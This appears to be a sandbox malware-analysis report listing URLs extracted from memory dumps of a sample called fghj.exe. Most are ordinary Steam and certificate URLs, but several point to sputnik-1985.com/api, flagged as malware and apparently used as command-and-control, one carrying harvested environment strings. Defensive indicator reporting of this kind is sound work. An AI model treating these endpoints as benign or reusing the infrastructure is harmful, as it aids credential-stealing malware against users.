                                                                                                    https://s.ytimg.com;fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://steam.tv/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.jfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#fghj.exefalse
                                                                                                                  		high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://store.steampowered.com/points/shop/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sputnik-1985.com/apilafghj.exe, 00000000.00000003.1602938681.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602899349.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602921017.0000000000D34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            http://ocsp.rootca1.amazontrust.com0:fghj.exe, 00000000.00000003.1564152101.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steaxUfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&afghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://sketchfab.comfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.ecosia.org/newtab/fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://ocsp.sectigo.com0&fghj.exefalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://lv.queniujq.cnfghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.youtube.com/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sputnik-1985.com/&0fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://store.steampowered.com/privacy_agreement/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_Afghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://sputnik-1985.com/fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    		unknown
                                                                                                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zfghj.exefalse
                                                                                                                                                      		high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amfghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/recaptcha/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://checkout.steampowered.com/fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootE46.crl0fghj.exefalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/;fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/about/fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://sputnik-1985.com/apibmfghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://ocsp.sectigo.com0fghj.exefalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.fastly.steamsfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otfghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://help.steampowered.com/en/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/market/fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
